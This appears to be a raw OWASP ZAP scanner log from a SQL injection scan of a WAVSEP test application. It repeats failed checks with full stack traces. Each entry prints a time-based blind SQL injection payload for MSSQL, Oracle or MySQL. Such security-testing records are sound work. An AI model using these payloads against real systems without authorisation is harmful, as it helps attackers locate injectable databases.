9680280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680281 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680282 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(90)||CHR(115)||CHR(74),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(90)||CHR(115)||CHR(74),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680283 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(112)||CHR(100)||CHR(102),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(112)||CHR(100)||CHR(102),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680285 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(120)||CHR(120)||CHR(66),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(120)||CHR(120)||CHR(66),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680285 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(77)||CHR(74)||CHR(65),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(77)||CHR(74)||CHR(65),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680287 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(118)||CHR(67)||CHR(106),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(118)||CHR(67)||CHR(106),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680289 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(69)||CHR(84)||CHR(99),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(69)||CHR(84)||CHR(99),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680290 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT * FROM (SELECT(SLEEP(5)))ObPo) AND (2111=2111] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND (SELECT * FROM (SELECT(SLEEP(5)))ObPo) AND (2111=2111 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680291 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))LftA)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT * FROM (SELECT(SLEEP(5)))LftA) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680292 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT * FROM (SELECT(SLEEP(5)))IaTa) AND ('nzdD'='nzdD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND (SELECT * FROM (SELECT(SLEEP(5)))IaTa) AND ('nzdD'='nzdD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680293 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT * FROM (SELECT(SLEEP(5)))cCaY) AND 'KrNQ'='KrNQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND (SELECT * FROM (SELECT(SLEEP(5)))cCaY) AND 'KrNQ'='KrNQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680294 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT * FROM (SELECT(SLEEP(5)))xebq) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND (SELECT * FROM (SELECT(SLEEP(5)))xebq) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680295 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))asOH)-- LNEu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND (SELECT * FROM (SELECT(SLEEP(5)))asOH)-- LNEu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 